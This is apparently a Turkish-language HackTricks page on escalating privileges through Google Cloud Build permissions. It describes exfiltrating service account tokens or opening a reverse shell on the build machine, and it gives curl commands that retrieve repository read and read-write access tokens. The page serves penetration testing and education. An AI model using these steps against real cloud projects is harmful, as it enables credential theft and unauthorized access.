GCP - Cloudbuild Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

cloudbuild

Cloud Build hakkında daha fazla bilgi için kontrol edin:

GCP - Cloud Build Enum

`cloudbuild.builds.create`

Bu izinle bir cloud build gönderebilirsiniz. Cloudbuild makinesi, dosya sisteminde varsayılan olarak bir cloudbuild Hizmet Hesabı token'ı bulunduracaktır: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Ancak, cloudbuild yapılandırmasında projede herhangi bir hizmet hesabını belirtebilirsiniz. Bu nedenle, makinenin token'ı sunucunuza dışarıya sızdırmasını sağlayabilir veya içinde bir ters shell alarak token'ı elde edebilirsiniz (token'ı içeren dosya değişebilir).

Orijinal exploit script'ini burada GitHub'da bulabilirsiniz (ancak token'ı aldığı yer benim için çalışmadı). Bu nedenle, bir vuln ortamının oluşturulması, istismar edilmesi ve temizlenmesi için bir script'i buradan kontrol edin ve cloudbuild makinesinde bir ters shell almak için bir python script'ini buradan çalın (kodda diğer hizmet hesaplarını nasıl belirteceğinizi bulabilirsiniz).

Daha derinlemesine bir açıklama için https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/ adresini ziyaret edin.

`cloudbuild.builds.update`

Potansiyel olarak bu izinle bir cloud build'i güncelleyebilir ve sadece hizmet hesabı token'ını çalabilirsiniz; bu, önceki izinle gerçekleştirildiği gibi (ama ne yazık ki bu yazının yazıldığı sırada o API'yi çağırmanın bir yolunu bulamadım).

TODO

`cloudbuild.repositories.accessReadToken`

Bu izinle kullanıcı, depoya erişmek için kullanılan okuma erişim token'ını alabilir:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"

`cloudbuild.repositories.accessReadWriteToken`

Bu izinle kullanıcı, depoya erişmek için kullanılan okuma ve yazma erişim belirtecini alabilir:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"

`cloudbuild.connections.fetchLinkableRepositories`

Bu izinle bağlantının erişim sağladığı reposları alabilirsiniz:

curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - ClientAuthConfig Privesc NextGCP - Cloudfunctions Privesc

Last updated 3 days ago